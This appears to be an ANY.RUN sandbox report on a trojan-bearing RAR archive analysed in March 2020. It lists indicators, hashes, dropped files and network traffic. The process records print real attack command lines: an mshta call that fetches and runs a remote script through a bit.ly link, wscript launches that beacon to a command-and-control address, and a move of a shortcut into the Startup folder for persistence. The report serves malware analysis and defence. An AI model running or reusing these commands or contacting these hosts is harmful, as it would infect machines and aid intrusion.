File name: 3249e2eb1eaa628dcf7c83062463bc6bad36515b130e760333da98ea8ffd362e.rar

Full analysis: https://app.any.run/tasks/67ebd848-26f8-4cb3-9a1f-8ff4f3a0c12e
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: March 31, 2020, 02:30:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5: B43FE451A3C763201A14541120A1D85E
SHA1: 5598E91EF16C20EB9017B1251F069C0CF6DCD00F
SHA256: 5680BC2C24051572E2CE56DA9F2722AEF824FF6FEFB5937C3558C91E8CE0706C
SSDEEP: 24:ZOrpEiMQ2drsJ11dqF973U0XCIGP8FZWx8MiIAU:ZSpxM3drsJvSn5ZWx8pIAU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Connects to CnC server
      • mshta.exe (PID: 3792)
    • Changes settings of System certificates
      • mshta.exe (PID: 3792)
  • SUSPICIOUS
    • Creates files in the user directory
      • mshta.exe (PID: 3792)
    • Executes scripts
      • cmd.exe (PID: 2628)
    • Starts CMD.EXE for commands execution
      • mshta.exe (PID: 3792)
      • WinRAR.exe (PID: 2736)
    • Reads Internet Cache Settings
      • mshta.exe (PID: 3792)
      • wscript.exe (PID: 3284)
      • wscript.exe (PID: 3292)
    • Starts MSHTA.EXE for opening HTA or HTMLS files
      • cmd.exe (PID: 3488)
    • Adds / modifies Windows certificates
      • mshta.exe (PID: 3792)
  • INFO
    • Reads internet explorer settings
      • mshta.exe (PID: 3792)
    • Reads settings of System Certificates
      • mshta.exe (PID: 3792)
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
Total processes: 44
Monitored processes: 8
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Processes shown in the graph, in the order listed ("no specs" marks processes without their own indicators): winrar.exe (no specs), cmd.exe (no specs), mshta.exe, cmd.exe (no specs), notepad.exe (no specs), cmd.exe (no specs), wscript.exe, wscript.exe

Process information

PID: 2736
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\3249e2eb1eaa628dcf7c83062463bc6bad36515b130e760333da98ea8ffd362e.rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.60.0

PID: 3488
CMD: "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://bit.ly/2UiZH6V
Path: C:\Windows\System32\cmd.exe
Parent process: WinRAR.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3792
CMD: C:\Windows\System32\mshta https://bit.ly/2UiZH6V
Path: C:\Windows\System32\mshta.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 11.00.9600.16428 (winblue_gdr.131013-1700)

PID: 1720
CMD: "C:\Windows\System32\cmd.exe" /C "ECHO risk2020>C:\Users\admin\AppData\Local\Temp\Password.txt&NOTEPAD.EXE C:\Users\admin\AppData\Local\Temp\Password.txt&DEL C:\Users\admin\AppData\Local\Temp\Password.txt"
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 680
CMD: NOTEPAD.EXE C:\Users\admin\AppData\Local\Temp\Password.txt
Path: C:\Windows\system32\notepad.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2628
CMD: "C:\Windows\System32\cmd.exe" /c start /b wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 1 & start /b wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 2 & move "C:\Users\admin\AppData\Local\Temp\Xbox.lnk" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3292
CMD: wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 1
Path: C:\Windows\system32\wscript.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Version: 5.8.7600.16385

PID: 3284
CMD: wscript "C:\Users\admin\AppData\Local\Temp\iilbat.vbs" 88.204.166.59:8080/edit 2
Path: C:\Windows\system32\wscript.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Version: 5.8.7600.16385
Total events: 4 437
Read events: 851
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 4
Text files: 5
Unknown types: 4

Dropped files

PID | Process | Filename | Type
3792 | mshta.exe | C:\Users\admin\AppData\Local\Temp\Cab3FFA.tmp | n/a
  MD5: n/a
  SHA256: n/a
3792 | mshta.exe | C:\Users\admin\AppData\Local\Temp\Tar3FFB.tmp | n/a
  MD5: n/a
  SHA256: n/a
3792 | mshta.exe | C:\Users\admin\AppData\Local\Temp\Xbox.lnk | n/a
  MD5: n/a
  SHA256: n/a
3792 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619 | der
  MD5: DE258D014D52CEE566B7A030B495EAFF
  SHA256: 25CC9F040653782203C0E3497C56CA3AD41479BA9C6C18F459C2C915B9D973C4
3792 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\QTO7CY0H.txt | text
  MD5: 250D34C0104F69BCBCE9E1FE4A7C43A7
  SHA256: 605ACC828E4E0B4F2A0F8F1388E61FB37DD854F8C6FAA26917C8A0A47E1374DD
2736 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa2736.20592\Password.txt.lnk | lnk
  MD5: F4D2B31353720527E1114AEBFDE0C6C9
  SHA256: CFBCD8B9F4E92856EFD47EBCF48D78F704E38B555A0A97693CC52C800BDF2A7E
3792 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\edit[1] | html
  MD5: 7FA5497ECFC96BD8E042DECFEADD9106
  SHA256: 33119A4E140F14619D5EB7EDA4A1BD3342280FDBFA85BAD7045E61418C3B3B3A
1720 | cmd.exe | C:\Users\admin\AppData\Local\Temp\Password.txt | text
  MD5: 6B733DFA4347AAE014B02C5A1142088D
  SHA256: 3C3066761BDCC0F3D12B90E1D42997EFAA67F24946F8B31A501CACCB0317876C
3792 | mshta.exe | C:\Users\admin\AppData\Local\Temp\iilbat.vbs | text
  MD5: CE09CDB7979FB9099F46DD33036B9001
  SHA256: 583BC1607CA8AAFA0B6EE9A4C6870085EF3F5F1823456F930EF32B0BF2229867
3792 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\2UiZH6V[1].htm | html
  MD5: D6C4D45E95CAE9910E1F9BA242CDB4DE
  SHA256: 6E6C934602E08EB5AF61C93FF68F0D203EA25ABCF86888BBC48CCC14341FB9D6
HTTP(S) requests: 7
TCP/UDP connections: 7
DNS requests: 4
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3792 | mshta.exe | GET | 200 | 88.204.166.59:8080 | http://www.cloudfiles.club:8080/edit?id=T8YJQTVktMp8W%2Bj/W5EvDWglxOnw8evApd1RaERyZzz/Qzh2uXI/OIlDzMTGaoc57qLEkLRpQt5RK8enWJAvRA%3D%3D | KZ | html | 2.32 Kb | malicious
3284 | wscript.exe | POST | 200 | 88.204.166.59:8080 | http://88.204.166.59:8080/edit?topic=v225&session=115964182&isbn=1269801 | KZ | text | 2 b | malicious
3792 | mshta.exe | GET | 200 | 72.21.91.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D | US | der | 471 b | whitelisted
3292 | wscript.exe | POST | 200 | 88.204.166.59:8080 | http://88.204.166.59:8080/edit?topic=v225&session=796896801&isbn=1269801 | KZ | text | 2 b | malicious
3792 | mshta.exe | GET | 200 | 72.21.91.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJ9L2KGL92BpjF3kAtaDtxauTmhgQUPdNQpdagre7zSmAKZdMh1Pj41g8CEAy%2BK8lPT%2B%2Fr4u1gFxGeJoE%3D | US | der | 471 b | whitelisted
3292 | wscript.exe | POST | 200 | 88.204.166.59:8080 | http://88.204.166.59:8080/edit?topic=s9819 | KZ | text | 6.82 Kb | malicious
3284 | wscript.exe | POST | 200 | 88.204.166.59:8080 | http://88.204.166.59:8080/edit?topic=s9819 | KZ | text | 6.82 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3792 | mshta.exe | 67.199.248.10:443 | bit.ly | Bitly Inc | US | shared
3792 | mshta.exe | 72.21.91.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted
3284 | wscript.exe | 88.204.166.59:8080 | www.cloudfiles.club | JSC Kazakhtelecom | KZ | malicious
n/a | n/a | 88.204.166.59:8080 | www.cloudfiles.club | JSC Kazakhtelecom | KZ | malicious
3292 | wscript.exe | 88.204.166.59:8080 | www.cloudfiles.club | JSC Kazakhtelecom | KZ | malicious
3792 | mshta.exe | 88.204.166.59:8080 | www.cloudfiles.club | JSC Kazakhtelecom | KZ | malicious

DNS requests

Domain | IP | Reputation
bit.ly | 67.199.248.10, 67.199.248.11 | shared
ocsp.digicert.com | 72.21.91.29 | whitelisted
www.cloudfiles.club | 88.204.166.59 | malicious

Threats

PID | Process | Class | Message
3284 | wscript.exe | A Network Trojan was detected | MALWARE [PTsecurity] Connect to a WMI service from VBA (reverse string obfuscation)
3292 | wscript.exe | A Network Trojan was detected | MALWARE [PTsecurity] Connect to a WMI service from VBA (reverse string obfuscation)
3 ETPRO signatures available at the full report
No debug info